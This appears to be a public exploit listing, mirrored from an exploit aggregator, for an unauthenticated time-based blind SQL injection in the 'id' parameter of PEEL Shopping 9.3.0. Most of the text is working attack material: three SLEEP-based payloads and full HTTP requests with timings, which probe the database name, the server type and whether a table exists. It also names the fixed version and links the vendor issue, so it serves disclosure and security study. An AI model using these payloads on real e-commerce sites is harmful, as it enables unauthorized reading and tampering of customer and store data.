Exploit for PEEL Shopping 9.3.0 SQL Injection

Name: Exploit for PEEL Shopping 9.3.0 SQL Injection
Rating: 5 (995 reviews)
2021-07-17 | CVSS 0.2
## https://sploitus.com/exploit?id=PACKETSTORM:163532
# Exploit Title: PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection  
# Date: 2021-07-10  
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)  
# Vendor Homepage: https://www.peel.fr  
# Software Link: https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_3_0.zip/download  
# Version: prior to 9.4.0  
# Tested on: Windows 10, XAMPP  
# Reference: https://github.com/advisto/peel-shopping/issues/3  
  
  
################  
# Description #  
################  
  
# PEEL Shopping is an eCommerce shopping cart application in PHP / MySQL which works on any hosting. Public user/guest (unauthenticated) can inject malicious SQL query in order to affect the execution of predefined SQL commands via the "id" parameter on the "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint. Upon successful of SQL injection attack, attacker can read sensitive data from the database or modify database data.  
  
  
#####################  
# PoC of detection #  
#####################  
  
1) Assumed peel-shopping_9_4_0 out of box installation database name is peel. This query will check if database() name like hex(%peel%) - it will delay for 7 seconds before redirect to homepage (http://localhost/peel-shopping_9_4_0/) that indicates TRUE SQL statement which mean the database name like "peel".  
  
PoC #1) param id - time-based SQLi  
Payload: (SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX)  
Request: The response duration = 418 bytes | 7,719 millis  
========  
  
GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX) HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/peel-shopping_9_4_0/  
DNT: 1  
Connection: close  
Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000  
Upgrade-Insecure-Requests: 1  
Sec-GPC: 1  
Cache-Control: max-age=0  
  
---  
  
2) Assumed the web is using MariaDB database server - check if db_version like hex(%MariaDB%), it will delay for 5 seconds if TRUE.  
  
PoC #2) param id - time-based SQLi  
Payload: (SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX)  
Request: The response duration = 418 bytes | 5,112 millis  
========  
  
GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX) HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/peel-shopping_9_4_0/  
DNT: 1  
Connection: close  
Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000  
Upgrade-Insecure-Requests: 1  
Sec-GPC: 1  
Cache-Control: max-age=0  
  
---  
  
3) By default, the database have a table name = peel_produits. This query will check if table_name peel_produits is exist, it will delay for 10 seconds if TRUE, else will redirect to homepage instantly.  
  
PoC #3) param id - time-based SQLi  
Payload: (SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX)  
Request: The response duration = 418 bytes | 10,140 millis  
========  
  
GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX) HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/peel-shopping_9_4_0/  
DNT: 1  
Connection: close  
Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000  
Upgrade-Insecure-Requests: 1  
Sec-GPC: 1  
Cache-Control: max-age=0  
  
---  
  
# For more explaination, you can refer to the github issue on peel-shopping via https://github.com/advisto/peel-shopping/issues/3.   
# The affected version is prior to 9.4.0. Now it is fixed on version 9.4.0.1  
# The vendor has released the latest patched version on 9.4.0.1 that is available for download from sourceforge.net[https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_4_0_1.zip/download]